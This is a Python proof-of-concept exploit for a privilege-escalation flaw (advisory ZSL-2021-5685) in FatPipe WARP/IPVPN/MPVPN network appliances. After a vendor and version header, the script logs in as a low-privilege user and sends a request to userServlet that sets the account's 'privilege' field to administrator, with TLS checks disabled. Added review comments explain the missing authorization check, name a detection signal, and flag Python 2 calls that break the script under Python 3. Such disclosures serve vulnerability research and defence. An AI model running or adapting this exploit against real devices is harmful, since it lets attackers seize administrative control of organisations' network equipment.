#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
#                   10.2.2r38
#                   10.2.2r25
#                   10.2.2r10
#                   10.1.2r60p82
#                   10.1.2r60p71
#                   10.1.2r60p65
#                   10.1.2r60p58s1
#                   10.1.2r60p58
#                   10.1.2r60p55
#                   10.1.2r60p45
#                   10.1.2r60p35
#                   10.1.2r60p32
#                   10.1.2r60p13
#                   10.1.2r60p10
#                   9.1.2r185
#                   9.1.2r180p2
#                   9.1.2r165
#                   9.1.2r164p5
#                   9.1.2r164p4
#                   9.1.2r164
#                   9.1.2r161p26
#                   9.1.2r161p20
#                   9.1.2r161p17
#                   9.1.2r161p16
#                   9.1.2r161p12
#                   9.1.2r161p3
#                   9.1.2r161p2
#                   9.1.2r156
#                   9.1.2r150
#                   9.1.2r144
#                   9.1.2r129
#                   7.1.2r39
#                   6.1.2r70p75-m
#                   6.1.2r70p45-m
#                   6.1.2r70p26
#                   5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#

import sys
import time#######
import requests################

# NOTE(review): disable_warnings() silences urllib3's InsecureRequestWarning;
# both POSTs below also pass verify=False, so the target's TLS certificate is
# never validated for this session.
requests.packages.urllib3.disable_warnings()

# Usage banner: exactly one argument (the target host/IP) is expected.
# NOTE(review): the bare `print` here (and again before the prompts) is a
# Python 2 statement; under the python3 shebang it just evaluates the builtin
# and prints nothing.
if len(sys.argv) !=2:
    print
    print("********************************************************")
    print("* *")
    print("* Privilege escalation from USER to ADMINISTRATOR role *")
    print("* in *")
    print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
    print("* *")
    print("* ZSL-2021-5685 *")
    print("* *")
    print("********************************************************")
    print("\n[POR] Usage: ./escalator.py [IP]")
    sys.exit()

# Target host/IP, used to build the https:// URLs and the Origin/Referer headers.
ajpi=sys.argv[1]

# Credentials of an existing low-privilege (USER group) account.
# NOTE(review): raw_input() exists only in Python 2; on Python 3 this line
# raises NameError (the builtin was renamed input()).
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")

# One session so the cookie issued by the login is reused for the second request.
sesija=requests.session()

# Login body: the form field 'loginParams' carries a JSON document assembled by
# string concatenation (the username/password values are not escaped).
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}

# Browser-like headers shared by both requests; Origin and Referer are pinned
# to the target so the requests appear same-origin to the application.
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
        'Accept' :'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With':'XMLHttpRequest',
        'Sec-Ch-Ua-Mobile':'?0',
        'User-Agent' :'Fatnet/1.b',
        'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin' :'https://'+ajpi,
        'Sec-Fetch-Site' :'same-origin',
        'Sec-Fetch-Mode' :'cors',
        'Sec-Fetch-Dest' :'empty',
        'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
        'Accept-Encoding' :'gzip, deflate',
        'Accept-Language' :'en-US,en;q=0.9',
        'Connection' :'close'}

# Step 1 - authenticate as the low-privilege user against /fpui/loginServlet.
# Success is decided by a substring match on 'success' in the response body.
juarel1='https://'+ajpi+'/fpui/loginServlet'

alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)

if not 'success' in alo.text:
    print('[GRE] Login error.')
    sys.exit()
else:
    print('[POR] Authentication successful.')
    print('[POR] Climbing the ladder...')

# Cosmetic ASCII art, written to stdout one character at a time.
sluba=''' || || .--._ ||====|| __ '---._) || ||"")\ Q Q ) ||====|| =_/ o / || || | \_.-;-'-,._ ||====|| | ' o---o ) || || \ /H __H\ / ||====|| '-' \"")\/ | || || _ |_='-)_/ ||====|| / '. ) || || / / ||====|| |___/\| / || || |_| | | ||====|| / ) \\ \\ || || (__/ \___\\ ||====|| \_\\ || || / ) ||====|| (__/ '''

for k in sluba:
    sys.stdout.write(k)
    sys.stdout.flush()
    time.sleep(0.01)

# Step 2 - the escalation request. The same authenticated USER session edits
# its own account through userServlet (loadType=set, block=userSetRequest):
# the 'userList' JSON entry carries action "edit" and "privilege":"1"
# (ADMINISTRATOR). Per the advisory the server applies this without verifying
# that the caller already holds the administrator role - the missing control
# is a server-side authorization check on userSetRequest that refuses a
# privilege change from a USER-group caller. For defenders, a non-admin
# session POSTing to userServlet?loadType=set&block=userSetRequest with a
# changed 'privilege' value is the event to alert on.
# NOTE(review): the advisory describes 'privilege' as integer 1, but the PoC
# sends it as the JSON string "1" - presumably the server coerces it; confirm.
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'

posta={ 'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' }

stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)

# Success is again a substring match ('true' anywhere in the response body).
if not 'true' in stanje.text:
    print('\n[GRE] Something\'s fishy!')
    sys.exit()
else:
    print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
    sys.exit()